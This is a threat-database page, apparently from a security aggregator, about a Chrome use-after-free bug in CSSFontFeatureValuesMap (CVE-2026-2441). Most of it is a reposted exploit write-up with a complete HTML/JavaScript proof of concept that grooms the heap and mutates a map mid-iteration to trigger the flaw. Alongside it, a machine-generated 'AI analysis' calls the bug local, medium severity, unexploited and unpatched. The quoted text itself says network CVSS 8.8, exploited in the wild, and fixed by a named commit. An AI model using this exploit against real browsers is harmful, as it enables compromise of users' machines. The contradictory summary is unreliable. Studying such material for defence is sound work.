Google Chrome 145.0.7632.75 - CSSFontFeatureValuesMap
An exploit targeting Google Chrome version 145. 0. 7632. 75 involving the CSSFontFeatureValuesMap feature has been identified. The exploit is classified as local and medium severity. Exploit code is available in text format, but no detailed technical or impact information is provided. There is no indication of known exploitation in the wild or patch availability.
AI Analysis
Technical Summary
This threat involves an exploit for Google Chrome version 145.0.7632.75 related to the CSSFontFeatureValuesMap feature. The exploit is categorized as local, implying it requires local access to the system to be executed. The available information lacks detailed technical specifics or vulnerability mechanics. Exploit code is publicly available as text, but no further context on exploitation or impact is provided.
Potential Impact
Based on the available data, the impact is assessed as medium severity. There is no evidence of active exploitation in the wild. The exploit potentially allows local attackers to leverage the CSSFontFeatureValuesMap feature in Chrome 145.0.7632.75, but specific consequences are not described.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. No official fix or vendor advisory information is provided. Users should monitor official Google Chrome security advisories for updates regarding this issue.
Indicators of Compromise
- exploit-code: # Exploit Title: Google Chrome 145.0.7632.75 - CSSFontFeatureValuesMap # Date: 2026-02-23 # Exploit Author: nu11secur1ty # Vendor Homepage: https://www.google.com/chrome/ # Software Link: https://www.google.com/chrome/ # Version: Chrome <= 144.x | Chrome < 145.0.7632.75 # Tested on: Windows 11 / Linux / macOS # CVE: CVE-2026-2441 # Exploit Repository: https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2026/CVE-2026-2441 ## Description A use-after-free vulnerability exists in Google Chrome's CSS engine (Blink) within the CSSFontFeatureValuesMap implementation. When an iterator is created over a CSSFontFeatureValuesMap object and the underlying HashMap is mutated during iteration, a rehash operation occurs, freeing the original memory while the iterator still holds a raw pointer to it. This leads to a use-after-free condition that can be exploited to execute arbitrary code inside the Chrome sandbox. The vulnerability was actively exploited in the wild as a zero-day before the patch was released. ## Vulnerable Versions - Google Chrome <= 144.x - Google Chrome < 145.0.7632.75 - Microsoft Edge (prior to Chromium 145 update) - Opera (prior to 127.0.5778.64) - Any Chromium-based browser using affected Blink versions ## Technical Details **Root Cause:** In `third_party/blink/renderer/core/css/css_font_feature_values_map.cc`, the `FontFeatureValuesMapIterationSource` holds a raw pointer (`const FontFeatureAliases* aliases_`) to the internal HashMap. When the map is mutated via `set()` or `delete()` during iteration, the HashMap rehashes, the old storage is freed, and the pointer becomes dangling. **Fix:** Commit `63f3cb4864c64c677cd60c76c8cb49d37d08319c` replaces the raw pointer with a deep copy (`const FontFeatureAliases aliases_`). ## CVSS Score **8.8 (High)** - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H ## Proof of Concept ```html <!DOCTYPE html> <!-- CVE-2026-2441 - CSSFontFeatureValuesMap UAF Author: nu11secur1ty Date: 2026-02-23 Repository: --> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="author" content="nu11secur1ty"> <title>CVE-2026-2441 PoC - nu11secur1ty</title> <style id="target-style"> @font-feature-values Target { @styleset { a:1; b:2; c:3; d:4; e:5; f:6; g:7; h:8; i:9; j:10; k:11; l:12; m:13; n:14; o:15; } } </style> <style id="groom-style"></style> </head> <body> <h2>CVE-2026-2441 Proof of Concept</h2> <p>Author: nu11secur1ty</p> <p>Check browser console for output. If browser crashes -> VULNERABLE</p> <script> // ================================================================= // CVE-2026-2441 Use-After-Free Exploit // Author: nu11secur1ty // ================================================================= console.log("=========================================="); console.log("CVE-2026-2441 PoC - nu11secur1ty"); console.log("=========================================="); // Heap grooming - create stable heap state function groomHeap(count) { let style = document.getElementById('groom-style'); if (!style || !style.sheet) return []; // Clear existing while (style.sheet.cssRules.length) { try { style.sheet.deleteRule(0); } catch(e) {} } // Create groom objects for (let i = 0; i < count; i++) { try { style.sheet.insertRule( `@font-feature-values Groom${i} { @styleset { v${i}: ${i}; } }`, style.sheet.cssRules.length ); } catch(e) {} } console.log("[+] Heap groomed with " + count + " objects"); return Array(count); } // Main exploit logic try { // Phase 1: Prepare heap groomHeap(64); // Phase 2: Get target map let sheet = document.getElementById('target-style').sheet; if (!sheet || !sheet.cssRules.length) { throw new Error("Target CSS rule not found"); } let rule = sheet.cssRules[0]; let map = rule.styleset; console.log("[+] CSSFontFeatureValuesMap size: " + map.size); // Phase 3: Create iterator - RAW POINTER CAPTURED HERE console.log("[*] Creating iterator (raw pointer captured)"); let iterator = map.entries(); let step = 0; let iterations = 0; // Phase 4: Trigger UAF through mutation + rehash console.log("[*] Triggering rehash + UAF..."); while (step < 10) { let result = iterator.next(); if (result.done) break; let [key, value] = result.value; iterations++; console.log(" [step " + step + "] Read: " + key + " = " + value); // MUTATION: delete current key map.delete(key); // MUTATION: massive insert to force rehash for (let i = 0; i < 512; i++) { map.set("spray_" + step + "_" + i, [i, i+1, i+2]); } step++; } console.log("[*] Completed " + iterations + " iterations"); // Phase 5: Final check console.log("[*] Exploit execution complete"); console.log("[*] If browser crashed: VULNERABLE"); console.log("[*] If page survived: PATCHED"); console.log("=========================================="); console.log("CVE-2026-2441 - nu11secur1ty"); console.log("Repository: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2026/CVE-2026-2441"); console.log("=========================================="); } catch (e) { console.log("[!] EXCEPTION: " + e.message); console.log("[!] This indicates UAF was triggered"); console.log("[!] CVE-2026-2441 - nu11secur1ty"); } // Force layout recalc as additional trigger void document.body.offsetWidth; </script> <!-- Alternative for...of trigger --> <script> try { let altStyle = document.createElement('style'); document.head.appendChild(altStyle); altStyle.sheet.insertRule( '@font-feature-values Alt{@styleset{x:1; y:2; z:3;}}', 0 ); let altMap = altStyle.sheet.cssRules[0].styleset; for (let [k, v] of altMap) { altMap.delete(k); for (let i = 0; i < 256; i++) { altMap.set("alt_" + i, [i]); } break; } } catch(e) { console.log("[!] Alternative trigger exception: " + e.message); } </script> </body> </html> # Demo: [href](https://www.patreon.com/posts/cve-2026-2441-151454779) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstorm.news/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
Google Chrome 145.0.7632.75 - CSSFontFeatureValuesMap
Description
An exploit targeting Google Chrome version 145. 0. 7632. 75 involving the CSSFontFeatureValuesMap feature has been identified. The exploit is classified as local and medium severity. Exploit code is available in text format, but no detailed technical or impact information is provided. There is no indication of known exploitation in the wild or patch availability.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
This threat involves an exploit for Google Chrome version 145.0.7632.75 related to the CSSFontFeatureValuesMap feature. The exploit is categorized as local, implying it requires local access to the system to be executed. The available information lacks detailed technical specifics or vulnerability mechanics. Exploit code is publicly available as text, but no further context on exploitation or impact is provided.
Potential Impact
Based on the available data, the impact is assessed as medium severity. There is no evidence of active exploitation in the wild. The exploit potentially allows local attackers to leverage the CSSFontFeatureValuesMap feature in Chrome 145.0.7632.75, but specific consequences are not described.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. No official fix or vendor advisory information is provided. Users should monitor official Google Chrome security advisories for updates regarding this issue.
Technical Details
- Edb Id
- 52542
- Has Exploit Code
- true
- Code Language
- text
Indicators of Compromise
Exploit Source Code
Exploit code for Google Chrome 145.0.7632.75 - CSSFontFeatureValuesMap
# Exploit Title: Google Chrome 145.0.7632.75 - CSSFontFeatureValuesMap # Date: 2026-02-23 # Exploit Author: nu11secur1ty # Vendor Homepage: https://www.google.com/chrome/ # Software Link: https://www.google.com/chrome/ # Version: Chrome <= 144.x | Chrome < 145.0.7632.75 # Tested on: Windows 11 / Linux / macOS # CVE: CVE-2026-2441 # Exploit Repository: https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2026/CVE-2026-2441 ## Description A use-after-free vulnerability exists in Google C... (6343 more characters)
Threat ID: 69f5140dcbff5d86105a401f
Added to database: 5/1/2026, 8:58:53 PM
Last enriched: 5/1/2026, 8:59:04 PM
Last updated: 5/2/2026, 5:49:53 AM
Views: 6
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.